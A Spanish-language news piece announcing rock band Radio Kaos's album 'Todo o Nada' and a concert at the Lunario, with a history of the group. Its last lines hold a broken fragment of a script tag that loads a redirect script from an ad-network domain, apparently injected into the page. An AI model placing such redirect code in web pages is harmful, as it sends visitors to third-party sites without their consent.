Radio Kaos presenta nuevo disco y concierto en el Lunario

Radio Kaos, integrados por David Pérez (voz y guitarra), Levith Vega (batería), Yahir Vega (bajo y voz) y Daniel Carranza (guitarra), se encuentran de plácemes tras la salida del que será su nuevo disco de estudio llamado Todo o Nada. La cita para esta noche llena de adrenalina será el próximo sábado 2 de julio en las instalaciones del Lunario. La banda invitada de la noche será Eurídice.

En Todo o Nada, Radio Kaos reafirmará el poder, energía y su gran calidad musical que los ha mantenido en el circuito del rock nacional. Esta nueva producción contará con 11 canciones inéditas y un bonus track en inglés. El álbum estará a la venta a partir del mes de julio y será editado por Prodisc.

El andar de Radio Kaos en la escena del rock nacional comenzó en 1992. El origen del nombre fue inspirado de la primera producción solista del músico británico Roger Waters, Radio K.A.O.S. Con su primer disco, Botas Negras, lanzado en 1995 de la mano de Emi Music y producido por Gustavo Borner y Mauricio Guerrero, el grupo comenzó a ganarse el respeto y cariño del público. De este material, se desprendieron éxitos como “Ritual”, “Abril” y “Botas Negras”.

Tres años después, 1998, publicaron su segundo disco llamado Radio Kaos, que fue producido por la misma banda y Michael Sambello, quien ha trabajado con gente de la talla de Michael Jackson, Phill Collins y Los Fabulosos Cadillacs. De este álbum se desprendieron los hits “Dónde”, “One love” y “Aprendiendo a volar”.

Para el 2002 llegó su tercera placa, Out In The Blue, donde contaron con la participación del guitarrista argentino Alejandro Marcovich. La rola “Si tú no estás” alcanzó los primeros lugares del Billboard latino.

Tras 10 años de silencio, Radio Kaos regresó a la escena en el 2013 de la mano de su trabajo sonoro Live Session, mismo que los llevó a presentarse por primera vez en el Festival Vive Latino, donde tuvieron una muy buena aceptación.

Ahora, en este 2016, Radio Kaos se encuentra más vivo que nunca y llegará de la mano de su nuevo disco, Todo o Nada a las instalaciones del Lunario del Auditorio Nacional, el próximo sábado 2 de julio, para ofrecer un memorable y emotivo concierto, que estará plagado de sus mejores éxitos, de nuevas canciones y de muchos amigos del mundo del rock and roll, que se sumarán a este festejo onírico.

Músicos invitados como Xava Drago, la voz de Coda; La Internacional Sonora Dinamita de Chucho Argain, Luis Álvarez, mejor conocido como “El Haragán”, Big Javi, vocalista de Inspector, Juan Chávez, cantante de Resorte y más….

Los boletos se encuentran a la venta en las taquillas del inmueble y a través del Sistema Ticketmaster.

www.radiokaos.com.mx

 

< src="https://restwp.mobidea.com/jsredir?v=1&sl=312182-3f487&redirect_option=1&data1=Track1&data2=Track2">

d.getElementsByTagName(‘head’)[0].appendChild(s);